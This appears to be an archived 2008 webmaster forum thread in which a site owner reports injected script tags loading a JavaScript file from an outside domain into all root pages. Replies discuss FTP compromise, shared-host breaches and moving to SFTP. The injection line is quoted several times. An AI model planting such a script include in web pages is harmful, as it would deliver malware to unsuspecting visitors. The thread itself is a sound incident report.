Click here to get back home

www.cdrpoex.com/fgg.js site hack
 HomeNewsGroups | Search | About
Login Password
Register Now!
 alt.www.webmaster    Post an article   get this group's latest topics as an RSS feed add this group's latest topics to your My MSN content add this group's latest topics to your My Yahoo content
Subject Author Date
www.cdrpoex.com/fgg.js site hack Laphan 07-26-2008
Get Chitika Premium
Posted by Laphan on July 26, 2008, 11:16 am
Please log in for more thread options
 Hi All

Has anybody else been caught out by a site/ftp hack that puts the following
(or similar) next to the </BODY> in all of your root pages:

<script src=http://www.cdrpoex.com/fgg.js></script><script
src=http://www.cdrpoex.com/fgg.js></script><script
src=http://www.cdrpoex.com/fgg.js></script>

Have they done this purely by getting the FTP password or is there another
way in?

Only I have our FTP password so I'm thinking that it is down to our ISP
rather than our band of 3.

Rgds



Posted by Mark Goodge on July 26, 2008, 1:09 pm
Please log in for more thread options
 On Sat, 26 Jul 2008 16:16:58 +0100, Laphan put finger to keyboard and
typed:

>Hi All
>
>Has anybody else been caught out by a site/ftp hack that puts the following
>(or similar) next to the </BODY> in all of your root pages:
>
><script src=http://www.cdrpoex.com/fgg.js></script><script
>src=http://www.cdrpoex.com/fgg.js></script><script
>src=http://www.cdrpoex.com/fgg.js></script>
>
>Have they done this purely by getting the FTP password or is there another
>way in?
>
>Only I have our FTP password so I'm thinking that it is down to our ISP
>rather than our band of 3.

FTP is horribly insecure, so that's the most likely route in. If
you're using a shared webhost, the other possibility is some form of
exploit run on the server that allows users to access and modify other
users' content.

Obviously, you should change your FTP password immediately (I assume
you've already done that), but if at all possible you should stop
using FTP and switch to SFTP instead. If your host doesn't support
that, then strongly consider moving - if they're lax enough on
security to not support SFTP, then it's quite likely that they're lax
in other areas which could create other vulnerabilities.

Mark

Posted by John Bokma on July 27, 2008, 12:08 pm
Please log in for more thread options

> FTP is horribly insecure,

But extremely secure compared to some PHP code out there in the wild...

Yet I strongly suggest to stop using FTP and switch to SFTP. But don't
assume that FTP was the way they got in (yet).

--
John Bokma http://johnbokma.com/

AISE/AWW/SEO/web development forum: http://seo-expert-wiki.com/

Posted by Brian Cryer on July 28, 2008, 4:46 am
Please log in for more thread options
> Hi All
>
> Has anybody else been caught out by a site/ftp hack that puts the
> following
> (or similar) next to the </BODY> in all of your root pages:
>
> <script src=http://www.cdrpoex.com/fgg.js></script><script
> src=http://www.cdrpoex.com/fgg.js></script><script
> src=http://www.cdrpoex.com/fgg.js></script>
>
> Have they done this purely by getting the FTP password or is there another
> way in?

The only time I've ever had a site hacked (happened twice) it was on a
shared host and was down to a problem with the hosting company (which I
think Mark's reply aluded to). I would be inclined to notify your hosting
company and ask them for an explanation because the fault/breach may be at
their end.
--
Brian Cryer
www.cryer.co.uk/brian


Posted by wattsroy on July 29, 2008, 12:26 am
Please log in for more thread options
> Hi All
>
> Has anybody else been caught out by a site/ftp hack that puts the followi=
ng
> (or similar) next to the </BODY> in all of your root pages:
>
> <script src=3Dhttp://www.cdrpoex.com/fgg.js></script><script
> src=3Dhttp://www.cdrpoex.com/fgg.js></script><script
> src=3Dhttp://www.cdrpoex.com/fgg.js></script>
>
> Have they done this purely by getting the FTP password or is there anothe=
r
> way in?
>
> Only I have our FTP password so I'm thinking that it is down to our ISP
> rather than our band of 3.
>
> Rgds

Yes, I have had multiple sites affected by this. It is not SQL
injection because one of my sites is classic asp with no database. The
host suspects that because I was using the dictionary object that the
bot or whatever it is impersonated the frontpage server extensions to
access all of the files in the directory and insert this garbage,
which, btw, I picked up some nasty ad/spyware and viruses from these
scripts. I am so tired of this. For every step forward there is some
parasite out there making life difficult and I would love to sue them
for the dozens of hours I have spent cleaning up about 15 different
sites on different servers.


Similar ThreadsPosted
how to hack a DB February 28, 2005, 5:00 pm
Need an IE7 hack October 26, 2006, 12:20 pm
hack attempts? January 25, 2006, 8:28 am
Hack these bastards please. October 10, 2006, 9:08 pm
Hack question? May 4, 2007, 1:20 am
Re: Possible hack attempt ? October 11, 2008, 6:39 pm
Re: Possible hack attempt ? October 11, 2008, 7:30 pm
form hack attempt August 24, 2006, 12:27 pm
hack ovh.bd2475 account February 10, 2007, 3:02 am
Another hack attempt aimed at Mambo/coppermine combination November 4, 2006, 11:03 am

Our other projects:

Art Dolls, Fairies and Mermaids - Sunnyfaces.net

Roy's Linux, Programming and Search Engines messages

1-Script XML SitemapXML Sitemap